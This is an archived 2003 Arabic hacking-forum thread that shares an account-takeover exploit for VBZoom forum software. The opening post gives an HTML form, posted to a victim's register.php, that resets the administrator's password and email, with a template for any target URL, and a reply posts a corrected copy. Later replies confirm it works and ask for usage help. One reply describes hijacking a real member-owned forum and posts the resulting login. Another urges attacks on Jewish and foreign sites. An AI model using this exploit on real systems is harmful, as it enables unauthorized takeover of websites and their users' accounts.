اختراق منتديات vbzoom [الأرشيف] - .:: منتديات العاصفة - اول منتدى عربي متخصص في التقنية والحماية ::.

مشاهدة النسخة كاملة : اختراق منتديات vbzoom

dtwrap2003

09-05-2003, 10:15

السلام عليكم
شباب انا اليوم اقدم لكم اهم ثغره معى الشرح المفصل
<form name="f1" action="http://www.victim.com/vbzoom/register.php" method="POST">
<input type="hidden" name="ChangeProfile" value="1">
User Name: <input type="text" name="UserName"><br>
Password: <input type="text" name="Password"><br>
Email: <input type="text" name="Email">
<input type="hidden" name="HomePage" value="lamerZ">
<input type="hidden" name="VBZooMForum&@#&@#&@#&@#&@#&@#sUserName" value="false">
<input type="hidden" name="VBZooMForum&@#&@#&@#&@#&@#&@#sUserName" value="false">
<input type="submit" value="reset password">
</form

<form name="f1" action="هنا تضع وصله الموقع " method="POST">
<input type="hidden" name="ChangeProfile" value="1">
User Name: <input type="text" name="UserName"><br>
Password: <input type="text" name="Password"><br>
Email: <input type="text" name="Email">
<input type="hidden" name="HomePage" value="lamerZ">
<input type="hidden" name="VBZooMForum&@#&@#&@#&@#&@#&@#sUserName" value="false">
<input type="hidden" name="VBZooMForum&@#&@#&@#&@#&@#&@#sUserName" value="false">
<input type="submit" value="reset password">
</form
وبعد ان تحط وصل الموقع
تسويه في صفحه html
وتكتب اسم الادمين والباسورد الجديده وايميل جديد
تحياتي

crash

10-05-2003, 08:51

شكرا على الثغرة بس ممكن شرح اكثر لاني ما فهمت شي

اسف على الازعاج ;)

wassem

14-05-2003, 10:16

موضوع حلو بس ممكن شوية شرح ولوحتى مختصر;);):D

HackeRMaN

17-05-2003, 08:24

كودك يعمل 100% شكرا لك ... لكن جميع منتديات vbzoom عربية من واجبنا حمايتها وليس اختراقها , يعطيك العافية :)

HackeRMaN

17-05-2003, 08:29

عفوا اخي العزيز هنالك بعض الاخطاء في الكود قمت بتعديلها:

<form name="f1" action="http://members.lycos.co.uk/alsaady/vb/vbzoom/register.php" method="POST">
<input type="hidden" name="ChangeProfile" value="1">
User Name: <input type="text" name="UserName"><br>
Password: <input type="text" name="Password"><br>
Email: <input type="text" name="Email">
<input type="hidden" name="HomePage" value="lamerZ">
<input type="hidden" name="VBZooMForum&@#&@#&@#&@#&@#&@#sUserName" value="false">
<input type="hidden" name="VBZooMForum&@#&@#&@#&@#&@#&@#sUserName" value="false">
<input type="submit" value="reset password">

استبدل http://members.lycos.co.uk/alsaady/vb/vbzoom/register.php بالموقع الذي تريد اختراقة ثم قم بحفظة بأمتداد html

redsignal

17-05-2003, 09:43

حاولت استخدامها و لكن لم تفلح معي ربما غلطت فى الطريق

غيرت اسم الموقع و اسم الادمن و الباسوورد و حفظتها علي النت بد

و حملتها الي الموقع المستهدف لا و زياده حرص ارسلتها رساله خاصه لعضو مجتهد مع شوى حركات تمويه و حاولت ادخل مانفع

جربت عن طريق الايميل علي اساس انى ناسي كلمه السر بس هم ما نفع وش السالفه ممكن شرح مفصل و ياليت المتغيرات يرمز لها با الرمز xxxxx
لان ممكن نقطه او داش تغير الكود كامل

و الف شكر

wassem

18-05-2003, 12:20

انا جرب وصار معي مثل مصار مع الاخ redsignal

شو السبب؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟:mad::mad::mad:

wassem

18-05-2003, 12:21

??????????????????:mad::mad::mad:

TaZ HaCkEr

22-05-2003, 09:13

شكرا الثغره شغاله مية ميه ;)

عكاوي

31-05-2003, 08:17

ممكن شرح
كيف نستخدم هذه الثغرة
ساعدونا

المحمد

03-06-2003, 12:44

اخووواني ارجوكم لاتعلقوووونا
ياخوان انا فاهم بس الطريقه مانجحت معايه
ممكن المتغيرات كما قال اخووووي تكون بعلامات مميزه لانكم انتوا اضحتوا بس الموقع كتبنا الموقع واسم الادمن ومعاكم حرف حرف بس الطريقه مانجحت ممكن شرح مفصل وبتحديد المتغيرات وايش الي نكتب فيها وشكرا

batman

03-06-2003, 09:16

حتى انا مافهمت بعد وش المطلوب ووين احفظ الكود هذا على امتداد html ولو غيرته وش رح يصير ارجو من كاتب المقال اعطائي الشرح لو تكرم |1|

HackTheM

04-06-2003, 02:38

فهموووووووووونا معاااااااااااااااكم

ســــــــحـــــر

مغادر الحياة

02-07-2003, 05:16

كيف الوصول للوحه التحكم
ياخوان وينكم نبي شرح للثغره
ولكم الف شكر

EVIL-MASTER

08-07-2003, 07:29

اعتقد ان الصغرة دهيا لتسجيل الدخول بدون اعطاء العضو اى ميزة سوى التصفح

ولو اى حد عنده اى فكرة ثانية يتكلم
:)

Ksa AL7ob

22-07-2003, 10:42

الثغره هذي صحيحه ..

هي فعلا تدخلك للمنتدى على هيئة الأدمن ..

لاكن ماتقدر تدخل لوحة التحكم باباسوورد اللي إنتا غيرته :)

مغادر الحياة

22-07-2003, 04:26

حفظة الصفحه على الامتداد html
كتبة الادمين والباسورد والايميل مرتين لكن مافهمت ايش اسوي بعدها لانه ماظهر شي لي

لو ممكن شرح بسيط ولكم الشكر

اوتـــUAEـــار

09-08-2003, 08:56

:mad::mad::mad: يا اخواني واخواتي نحن كلنا عرب مو نخترق مواقع عربيه لازم نخترق مواقع اجنبيه واليهود

لو لكم جرئه اخترقوا مواقع اليهود مو العرب يا الغاليين صح ام اني غلطان في الرد انتم تتصارعون في اختراق مواقع عربيه وليش ما تتصارعون في اختراق مواقع اجنبيه
والله المستعان يا اخواني

السيف

10-08-2003, 10:06

هكرز المواقع

11-08-2003, 03:18

شكرا الثغرة شغعالة 100%

مغادر الحياة

11-08-2003, 04:12

ياخوان ممكن توضيح كيف نطبق الثغره

مغادر الحياة

23-08-2003, 06:04

وينكم يامشرفين هذه الثغره مالها حل عندي

كيف طريقتها

العاصف99

28-08-2003, 01:17

لاااااااااااااااااااااااااااااااا ااحد يسااال لان مااافي اااحد ررراااح يرد علية ويقووولة كيف الطريقة:D:p:p

|3||3|

خالد7

30-08-2003, 04:39

طيب

هذا الملف غير بس اسم الموقع وحط موقع بس يكون على زوم

وانا ماجربته بس جربت على واحد ولقيت نفسي مدير على الموقع فقط

saso

30-08-2003, 06:08

يا اخوان يا مشرفين يا تاز هكر الرجاء شرح الثغره ارجوكم
اناشدكم
وشرح كيفيه بحث عن منتديات اسرائيليه

مغادر الحياة

31-08-2003, 08:55

مشكور خالد 7 على تعاونك

فتحت السورس ووضعت الموقع وحفظت باامتداد html

لكن فتح لي صفحه محجوبه وهي

http://www.web1000.com/

ومعرفة ايش الحل

arab_hak

04-09-2003, 03:39

يا اخي افتح النوت باد(المفكره)

والصق فيها هذا الكود مع تغيير المطلوب وحفضها بامتداد هتمل كيف تحفظها بهذاالامتداد
انا اقولك لمن تحط الكود في المفكر سوي حفظ بسم وسمه مثلا vbzoom.html
يعني اي اسم وبعد .html

ارجو ان المعلومه وصلت

والباقي من الموضوع

ورود القبر

05-09-2003, 12:18

شباب هي موقعي اتمني لو اللي حاط الثغره يطبق على المنتدي و شكرا

http://members.lycos.co.uk/vb90009

و هو من فئة الفيبي زووم

مغادر الحياة

06-09-2003, 05:29

arab_hak

شكرا على المعلومه :D لكن معليش اكيد اني حافظها بامتداد لغة اتش تي ميل

ومعدل بالسورس لكن ماوجدت لها حل

لكن ماقصرت اخوي على الاهتمام بالموضوع .

Dark-Blues

بايعها حلو والله :D

مزوح تجي وتروح

<---- فايق ورايق

شكرا Dark-Blues
على الخطوه الحلوه منك

MR.DJAY

07-09-2003, 04:08

أخي العزيز Dark-Blues بناء" على طلبك تم اختراق الموقع في سبيل التجربة
UserName:vb90009
Password:DJAY2003
لكن لم يتم رفع أي INDEX ولم يتم تعديل أي شئ
( وإذا انسحب الباس منك قل لي لأسترجعها لك )
بالنسبة لرفع الصفحات هل تتحكم منه من Control الخاص بال Vbzoom من عندك من الجهاز
يعني لازم تكون منزل المنتدى على جهازك أو بالأحرى محمله من جهازك على النت
يعني كيف ترفع صفحات وتغير أو هنالك صفحة لل Admin

مغادر الحياة

07-09-2003, 10:39

MR.DJAY

تقدر توضح كيف وصلت للباس واليوزر نيم

لو سمحت تفصيل ممل ولا شكرا

انا متوقع انه فيه خطا في الكود الموجوده عشان كذا ماهي راكبه معايا

ورود القبر

09-09-2003, 12:26

بس ياريت لو تحط لي الباسورد مالي لانه السا الباسورد مال النيك نيم مالي يشتغل عادي يعني لساتني مدير و ياريت يا DJAY تغير ال انديكس او تحط موضوع بأسمي اقصد في النيك نيم مالي vb90009 اذا اخترقته مثل ما تقول و شكرا

MR.DJAY

10-09-2003, 12:47

أخي العزيز مغادر الحياة جرب مرة أخرى الكود يعمل 100%
------------------
أخي العزيز Dark-Blues
في مشكلة أنه لما تجي تغير في التحكم الباس
http://members.lycos.co.uk/vb90009/register.php?ChangeProfile=1
يقول أدخل المعرف لكن
TextBox المعرف لا يكتب فيه
أتمنى تكون فهمت علي

مغادر الحياة

10-09-2003, 06:18

يلا مافي امل اخترق بهذه الثغرة

ورود القبر

10-09-2003, 10:16

انا مسكر الثغره هذه مخلها حيط ( جدار ) لوووول

مــiiiــــاكــس

10-09-2003, 10:35

الثغره فيها شويت مشاكل بس يبيلها فهم

متشكر اوي